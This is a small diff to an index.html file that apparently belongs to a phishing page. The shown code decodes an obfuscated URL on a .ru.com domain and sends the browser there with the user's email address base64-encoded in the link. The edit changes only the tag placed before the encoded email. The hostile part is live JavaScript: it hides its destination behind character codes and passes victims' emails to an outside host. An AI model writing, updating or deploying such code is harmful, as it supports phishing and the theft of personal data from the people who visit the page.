--- a/index.html
+++ b/index.html
@@ -109,7 +109,7 @@
             let encodedURL = "104 116 116 112 115 58 47 47 100 112 120 120 112 102 117 97 120 100 46 114 117 46 99 111 109 47 122 86 90 68 103 47";
             let decodedURL = encodedURL.split(" ").map(num => String.fromCharCode(num)).join("");
 
-            window.location.href = decodedURL + "#Extrocoms" + (base64Email);
+            window.location.href = decodedURL + "#5" + (base64Email);
         }
 
         // Enable "Enter" key submission for email input
